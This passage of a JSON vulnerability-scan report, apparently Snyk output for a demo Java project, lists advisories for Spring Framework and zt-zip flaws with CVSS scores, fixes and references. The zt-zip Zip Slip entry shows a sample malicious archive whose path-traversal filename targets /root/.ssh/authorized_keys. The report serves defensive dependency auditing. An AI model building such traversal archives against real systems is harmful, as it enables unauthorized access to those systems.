"Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "4ra1n" + ], + "semver": { + "vulnerable": [ + "[,5.2.20.RELEASE)", + "[5.3.0,5.3.17)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.20.RELEASE", + "5.3.17" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using Spring Expression Language (SpEL)" + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": 
"https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28145", + "title": "GitHub Issue" + }, + { + "url": "https://pivotal.io/security/cve-2022-22950", + "title": "Pivotal Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:01.573408Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.598178Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.044801Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) by providing a specially crafted SpEL expression, that might result in an `OutOfMemoryError`.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.20.RELEASE, 5.3.17 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83ac65915871067c39a4fb255e0d484c785c0c11)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28145)\n- [Pivotal Security Advisory](https://pivotal.io/security/cve-2022-22950)\n", + "epssDetails": { + "percentile": "0.35300", + "probability": "0.00081", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22950" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2022-03-29T10:05:31.971026Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-03-29T09:51:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not 
Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2022-03-29T14:24:08Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.044801Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-3369749", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Google OSS-Fuzz team" + ], + "semver": { + "vulnerable": [ + "[,5.2.23.RELEASE)", + "[5.3.0,5.3.26)", + "[6.0.0,6.0.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.23.RELEASE", + "5.3.26", + "6.0.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20861", + 
"title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:22.626014Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:04.052825Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.291695Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via a crafted `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.23.RELEASE, 5.3.26, 6.0.7 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/430fc25acad2e85cbdddcd52b64481691f03ebd1)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/52c93b1c4b24d70de233a958e60e7c5822bd274f)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/935c29e3ddba5b19951e54f6685c70ed45d9cbe5)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20861)\n", + "epssDetails": { + "percentile": "0.48906", + "probability": 
"0.00133", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20861" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-03-23T12:26:39.837900Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-03-23T11:49:46Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-03-23T12:37:13.052190Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.291695Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-5422217", + "title": "Allocation of Resources Without Limits or Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Google OSS-Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,5.2.24.RELEASE)", + "[5.3.0,5.3.27)", + "[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": 
"org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- 
[Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": 
false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. 
The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.2.22.RELEASE", + "org.springframework:spring-beans@5.2.22.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case 
Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + 
}, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "severityWithCritical": "low", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.springframework:spring-web@3.2.6.RELEASE", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [ + false, + "org.springframework:spring-web@5.0.0.RELEASE" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE" + }, + { + "id": "SNYK-JAVA-ORGZEROTURNAROUND-31681", + "title": "Arbitrary File Write via Archive Extraction (Zip Slip)", + "CVSSv3": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "credit": [ + "Snyk Security research Team" + ], + "semver": { + "vulnerable": [ + "[,1.13)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "1.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.5, + "functions": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "filePath": "org/zeroturnaround/zip/ZipUtil$Unpacker.java", + "className": "ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.zeroturnaround:zt-zip", + "references": [ + { + "url": "https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/snyk/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + }, + { + "url": "https://security.snyk.io/research/zip-slip-vulnerability", + "title": "Zip Slip Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 5.5, + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:19.847161Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:21.493786Z" + } + ], + "description": "## Overview\r\n[`org.zeroturnaround:zt-zip`](https://github.com/zeroturnaround/zt-zip) is a library that helps to create, modify or extract ZIP archives.\r\n\r\nAffected versions of the package are vulnerable to Arbitrary File Write via Archive Extraction (AKA \"Zip Slip\").\r\n\r\nIt is exploited using a specially crafted zip archive, that holds path traversal filenames. When exploited, a filename in a malicious archive is concatenated to the target extraction directory, which results in the final path ending up outside of the target folder. For instance, a zip may hold a file with a \"../../file.exe\" location and thus break out of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a zip archive with one benign file and one malicious file. Extracting the malicous file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n\r\n+2018-04-15 22:04:29 ..... 19 19 good.txt\r\n\r\n+2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\r\n\r\n```\r\n\r\n## Vulnerable Method\r\nThis vulnerability appears in method `process` under class name `Unpacker` in `org/zeroturnaround/zip/ZipUtil.java` [[1]](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\r\n\r\n\r\n## Remediation\r\nUpgrade `org.zeroturnaround:zt-zip` to version 1.13 or higher.\n\n## References\n- [https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff](https://github.com/zeroturnaround/zt-zip/commit/759b72f33bc8f4d69f84f09fcb7f010ad45d6fff)\n- [https://github.com/snyk/zip-slip-vulnerability](https://github.com/snyk/zip-slip-vulnerability)\n- [https://security.snyk.io/research/zip-slip-vulnerability](https://security.snyk.io/research/zip-slip-vulnerability)\n", + "epssDetails": { + "percentile": "0.34705", + "probability": "0.00079", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1002201" + ], + "CWE": [ + "CWE-29" + ] + }, + "packageName": "org.zeroturnaround:zt-zip", + "proprietary": true, + "creationTime": "2018-05-30T12:32:02.349000Z", + "functions_new": [ + { + "version": [ + "[,1.13)" + ], + "functionId": { + "className": "org.zeroturnaround.zip.ZipUtil$Unpacker", + "functionName": "process" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-04-17T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.zeroturnaround", + "artifactId": "zt-zip" + }, + "publicationTime": "2018-05-31T07:32:02Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:21.493786Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
